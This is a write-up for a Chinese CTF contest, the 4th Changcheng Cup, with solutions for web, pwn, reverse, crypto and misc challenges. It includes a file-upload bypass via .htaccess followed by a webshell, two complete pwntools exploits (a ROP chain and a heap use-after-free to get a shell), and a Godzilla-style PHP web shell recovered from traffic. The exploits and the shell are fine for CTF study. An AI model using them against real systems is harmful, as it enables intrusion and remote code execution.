第四届“长城杯”网络安全大赛

Web

SQLUP

爆破得到账号admin 密码1

发现文件上传过滤了字母p

上传.htaccess:AddType application/x-httpd-php .txt 解析.txt为php

传一句话木马

tac /flag得到flag

Pwn

FlowerShop

from pwn import *
from varname import argname

context(arch='amd64', os='linux')
# context.log_level='debug'
file = './pwn'
elf = ELF(file)
# NOTE(review): a local copy is spawned here, but the handle is rebound to
# remote() two lines below, so this process is never used and is not
# explicitly closed.
p = process(file)
lk = ''.split()  # NOTE(review): empty host/port list, unused in this script
p=remote("8.147.129.22",15172)
context.terminal = ['ssh-gdb-helper']

# Short aliases for the pwntools tube API used throughout the script.
pr = print
pa = lambda : pause()
re = lambda m, t : p.recv(numb=m, timeout=t)  # shadows the `re` module name re-exported by pwn
ru = lambda x, y=0 : p.recvuntil(x, drop=y)
rl = lambda : p.recvline()
sd = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
ia = lambda : p.interactive()
sla = lambda a, b : p.sendlineafter(a, b)
sa = lambda a, b : p.sendafter(a, b)
uu32 = lambda x : u32(x.ljust(4,b'\x00'))  # unpack up to 4 bytes, NUL-padded on the right
uu64 = lambda x : u64(x.ljust(8,b'\x00'))  # unpack up to 8 bytes, NUL-padded on the right
pv = lambda x : success('%s: %s'%(argname('x'), hex(x)))  # log a value under its variable name

def lzsl(exp):
    """Send `exp` as one line, then wait 0.3 s so the target has consumed it
    before the next line is sent."""
    settle = 0.3
    sl(exp)
    sleep(settle)

padding = 61  # NOTE(review): dead assignment, overwritten by `padding = 24` below before any use
sl(b'pwn\x00'*15)  # 60 bytes: fifteen NUL-terminated "pwn" strings

# Walk the program's menu; what each choice ("a", "c", "b", "1") means is
# defined by the challenge binary, which is not part of this write-up.
lzsl(b'a')
lzsl(b'a')
lzsl(b'1')

lzsl(b'a')
lzsl(b'1')

lzsl(b'c')
lzsl(b'1')

# gdb.attach(p,"""b *0x000400CC1 if *$rdi != 0
# b *0x0000400CE4
# b *0x0000400A0E
# b *0x00004009FF""")
lzsl(b'b')  # presumably the option that reads the overlong input sent below
# lzsl(b'1')

# Fixed addresses from the binary (0x400000-based, i.e. no PIE):
# system@plt and the location of a "/bin/sh" string.
system_plt = 0x400730
binsh = 0x601840

# ROP gadgets (gadget-finder listing kept from the original):
# 0x0000000000400f13 : pop rdi ; ret
# 0x00000000004006f6 : ret
rdi = 0x400f13
ret = 0x4006f6
padding = 24  # bytes from the start of the buffer to the saved return address
# Chain: filler, a lone `ret` (the usual reason is to keep rsp 16-byte
# aligned when system() is entered), pop rdi <- &"/bin/sh", system@plt.
exp = flat(
    cyclic(padding),
    ret,
    rdi,
    binsh,
    system_plt
)
assert len(exp) <= 0x46  # presumably the size of the read that receives this input -- confirm against the binary
sl(exp)
ia()

Kylin_Heap

from pwn import *
from varname import argname

context(arch='amd64', os='linux')
context.log_level='debug'
file = './Heap'
elf = ELF(file)
p = process(file)  # local run; the commented remote() line below targets the live instance
lk = '8.147.134.24 22923'.split()  # [host, port] of the challenge server (port kept as a str)
# p = remote(lk[0], lk[1])
context.terminal = ['ssh-gdb-helper']

# Short aliases for the pwntools tube API used throughout the script.
pr = print
pa = lambda : pause()
re = lambda m, t : p.recv(numb=m, timeout=t)  # shadows the `re` module name re-exported by pwn
ru = lambda x, y=0 : p.recvuntil(x, drop=y)
rl = lambda : p.recvline()
sd = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
ia = lambda : p.interactive()
sla = lambda a, b : p.sendlineafter(a, b)
sa = lambda a, b : p.sendafter(a, b)
uu32 = lambda x : u32(x.ljust(4,b'\x00'))  # unpack up to 4 bytes, NUL-padded on the right
uu64 = lambda x : u64(x.ljust(8,b'\x00'))  # unpack up to 8 bytes, NUL-padded on the right
pv = lambda x : success('%s: %s'%(argname('x'), hex(x)))  # log a value under its variable name

libc = ELF('./libc.so.6')  # libc shipped with the challenge; symbol offsets below come from it

def add(size, content):
    """Menu option 1: allocate a chunk of `size` bytes holding `content`.

    Answers the size prompt and the data prompt in turn, then pauses briefly
    so the target has consumed the input before the next command is sent.
    """
    sl(b'1')
    sla(b'(1 to 1280 bytes):', str(size))
    sla(b'bytes):', content)
    sleep(0.5)

def delete(index):
    """Menu option 2: free the chunk at `index` (the prompt accepts 0-19)."""
    sl(b'2')
    sla(b'Enter the index (0-19):', str(index))
    sleep(0.5)

def show(index):
    """Menu option 4: ask the target to display the chunk at `index`
    (presumably prints its contents; the caller reads the output)."""
    sl(b'4')
    sla(b'(0-19):', str(index))
    sleep(0.5)

def edit(index, content):
    """Menu option 3: overwrite the chunk at `index` with `content`."""
    sl(b'3')
    sla(b'Enter the index (0-19):', str(index))
    sla(b'bytes):', content)
    sleep(0.5)

# Layout: chunk 0 is large (0x4f0) so that freeing it does not go to tcache
# but to the unsorted bin; chunks 1-3 are 0x68 (0x70 tcache bin).
add(0x4f0,"aaaa")
add(0x68,"bbbb")
add(0x68,"cccc")
add(0x68,"dddd")
delete(1)  # tcache[0x70]: 1
delete(2)  # tcache[0x70]: 2 -> 1
delete(0)  # unsorted bin; its fd/bk now point into libc (main_arena)
pa()
# The program still lets a freed index be shown and edited (use-after-free);
# that dangling pointer is the bug the whole chain rests on.
show(0)
ru("[0]:\n")
# The 6 bytes printed after the index are the leaked libc pointer;
# 0x1ebbe0 is its offset from the base of the shipped libc.
libc_base = uu64(re(6,2)) - 0x1ebbe0
# Write &__free_hook into the tcache "next" field of freed chunk 2.
edit(2,p64(libc_base+libc.sym['__free_hook']))

add(0x68,"/bin/sh\x00")  # takes chunk 2 back; its data is what free() will later receive
add(0x68,p64(libc_base+libc.sym['system']))  # this allocation lands on __free_hook; store &system there
pv(libc_base)

# gdb.attach(p)
delete(2)  # free() on the "/bin/sh" chunk now goes through __free_hook -> system (assumes index 2 still refers to that memory)
ia()

Reverse

easyre

# Ciphertext bytes extracted from the binary.
enc = [
    0x0A, 0x0D, 0x06, 0x1C, 0x1D, 0x05, 0x05, 0x5F, 0x0D, 0x03,
    0x04, 0x0A, 0x14, 0x49, 0x05, 0x57, 0x00, 0x1B, 0x19, 0x02,
    0x01, 0x54, 0x4E, 0x4C, 0x56, 0x00, 0x51, 0x4B, 0x4F, 0x57,
    0x05, 0x54, 0x55, 0x03, 0x53, 0x57, 0x01, 0x03, 0x07, 0x04,
    0x4A, 0x77
]

# Undo the chained XOR in place, walking from the last byte to the first:
# each byte is XORed with the byte at the next index (the last one wraps
# around to index 0, which is still ciphertext at that point).
last = len(enc) - 1
for idx in reversed(range(len(enc))):
    neighbour = 0 if idx == last else idx + 1
    enc[idx] ^= enc[neighbour]

result_string = ''.join(map(chr, enc))
print(result_string)

#flag{fcf94739-da66-467c-a77f-b50d12a67437}

Crypto

RandomRSA

通过LCG的递推公式,可以得到:
$$
X_{n+1} = aX_n + b \pmod p \\
n = pq = (X_n + \epsilon_1)(aX_n + b + \epsilon_2)
$$

显然这是在
$$
Z^*_p
$$
下关于
$$
X
$$
的二次方程。如果没有 next_prime 这个函数引入的小量
$$
\epsilon
$$
,那么直接解这个方程就能得到
$$
X
$$

但是由于有这两个误差,而经过测试,发现这个误差是完全可预测的,大概在
$$
(0,1000)
$$
这个范围,所以可以利用这个来爆破计算
$$
X
$$

# SageMath: symbolic variables for the LCG state x1, the LCG parameters a, b,
# the two next_prime() offsets e1, e2 and the RSA modulus n.
var("x1,a,b,e1,e2,n")

# n = p*q with p = x1 + e1 and q = a*x1 + b + e2 (one LCG step plus its offset).
f = (x1 + e1)*(a*x1 + b + e2) - n
expand(f)  # collect f as a quadratic in x1; the printed result is reproduced below

# a*e1*x1 + a*x1^2 + b*e1 + e1*e2 + b*x1 + e2*x1 - n

$$
aX^2 + (b + e_2 + ae_1)X + (be_1 + e_1e_2 - n) = 0 \pmod p
$$
这里可以使用 SageMath 的 roots() 进行爆破，但是由于 roots() 解根的时间比较久，所以可以采用求根公式，先验证
$$
\Delta = B^2 - 4AC
$$
是否在
$$
Z^*_p
$$
下正好是二次剩余,以减少爆破的次数。

# LCG modulus / multiplier / increment and RSA modulus / ciphertext.
# The values are omitted in the write-up, so these two lines are incomplete
# as published. Zmod, Integer, inverse_mod and is_prime are SageMath names.
p,a,b = 
n,c =

# Brute-force the two next_prime() offsets: i = e1 (p = X + e1) and
# j = e2 (q = aX + b + e2). NOTE(review): range(1000,1,-1) stops at 2,
# so offsets 0 and 1 are never tried.
for i in range(1000,1,-1):
    flag = False
    for j in range(1000,1,-1):
        # Coefficients of a*X^2 + (b + e2 + a*e1)*X + (b*e1 + e1*e2 - n) = 0 (mod p).
        A = a
        B = (b + j + a*i)
        C = (b*i + i*j - n)
        delta = B**2 - 4*A*C
        # Euler's criterion: delta is a non-zero quadratic residue mod p iff
        # delta^((p-1)/2) == 1; skip the slow square root otherwise.
        if pow(delta, (p - 1) // 2, p) != 1:
            continue
        # all=True yields both square roots, so "-B + root" already covers
        # the +/- of the quadratic formula.
        roots = Zmod(p)(delta).sqrt(all=True)
        for root in roots:
            root = Integer(root)
            x = (-B + root )*inverse_mod(2*A,p) % p
            # The candidate prime X + e1 must divide n.
            if n % (x + i) == 0:
                print(i,j)
                print(x+i)
                flag = True
                break
        if flag:
            break
    if flag:
        break

# x, i and j keep the values from the successful iteration.
# q is reduced with the LCG modulus p *before* p is rebound to the RSA prime.
q = int(a*x + b + j) % p
p = int(x + i)
print(q)
print(p)
assert is_prime(p) and is_prime(q)

d = pow(0x10001,-1,(p-1)*(q-1))  # e = 65537; modular inverse via pow() (Python >= 3.8)
m = pow(c,d,n)
print(bytes.fromhex(hex(m)[2:]))  # NOTE(review): fromhex() needs an even digit count; an odd-length hex(m) raises

Misc

BrickGame

漏洞探踪,流量解密

根据题目信息和流量包掩码爆破192.168.30.xxx;得到压缩包2的解压密码是192.168.30.234

筛选 HTTP 流得到 RC4 的 hint

逐行查阅http流,找到rec的密文和key

3561373666363735313537366462653161663439333238616131643264326265613136656636326166613361376336313664    #ENC
6264623865323165616365383164356664323163613434356363623335303731 #KEY

最安全的加密方式

导出保存为rar文件

<?php
# Web shell recovered from the capture. Its structure (payload cached in the
# session, XOR "encode" with a 16-byte key, base64 transport, md5-derived
# response framing) matches the Godzilla PHP XOR/base64 template --
# NOTE(review): confirm the family before labelling it in a report.
@session_start();
@set_time_limit(0);    # no execution time limit
@error_reporting(0);   # hide every PHP error/warning from the response
# XOR each byte of $D with a byte of $K, cycling through key positions
# ($i+1)&15, i.e. 1..15,0. XOR is its own inverse, so the same function
# both encrypts and decrypts.
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];   # `+` binds tighter than `&`: index is ($i+1) & 15
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='25ming@'; # name of the POST parameter; per the write-up also the archive password
$payloadName='payload';  # session key under which the stage-2 code is cached
$key='3c6e0b8a9c15224a';  # 16-byte XOR key
if (isset($_POST[$pass])){
    # Request body: base64 -> XOR-decode with $key.
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        # Stage 2: decode and execute the cached payload; run() is not
        # defined in this file, so it is presumably provided by that payload.
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);
        # The response is framed by the first 16 and the remaining hex chars of
        # md5($pass.$key); constant per key, which makes it a usable
        # detection marker in traffic.
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        # Stage 1: the first request whose decoded body contains
        # "getBasicsInfo" is stored (XOR-encoded) in the session.
        if (stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

解压得到一堆 MD5，挨个解密即可

8fa14cdd754f91cc6554c9e71929cce7
2db95e8e1a9267b7a1188556b2013b33
0cc175b9c0f1b6a831c399e269772661
b2f5ff47436671b6e533d8dc3614845d
f95b70fdc3088560732a5ac135644506
b9ece18c950afbfa6b0fdbfa4ff731d3
2510c39011c5be704182423e3a695e91
e1671797c52e15f763380b45e841ec32
b14a7b8059d9c055954c92674ce60032
6f8f57715090da2632453988d9a1501b
cfcd208495d565ef66e7dff9f98764da
03c7c0ace395d80182db07ae2c30f034
e358efa489f58062f10dd7316b65649e
b14a7b8059d9c055954c92674ce60032
c81e728d9d4c2f636f067f89cc14862c
e1671797c52e15f763380b45e841ec32
4a8a08f09d37b73795649038408b5f33
4c614360da93c0a041b22e537de151eb
4b43b0aee35624cd95b910189b3dc231
e1671797c52e15f763380b45e841ec32
b14a7b8059d9c055954c92674ce60032
e1671797c52e15f763380b45e841ec32
8d9c307cb7f3c4a32822a51922d1ceaa
4a8a08f09d37b73795649038408b5f33
4b43b0aee35624cd95b910189b3dc231
57cec4137b614c87cb4e24a3d003a3e0
83878c91171338902e0fe0fb97a8c47a
e358efa489f58062f10dd7316b65649e
865c0c0b4ab0e063e5caa3387c1a8741
d95679752134a2d9eb61dbd7b91c4bcc
7b8b965ad4bca0e41ab51de7b31363a1
9033e0e305f247c0c3c80d0c7848c8b3
9033e0e305f247c0c3c80d0c7848c8b3
9033e0e305f247c0c3c80d0c7848c8b3
cbb184dd8e05c9709e5dcaedaa0495cf

#flag{The_m0st_2ecUre_eNcrYption!!!}
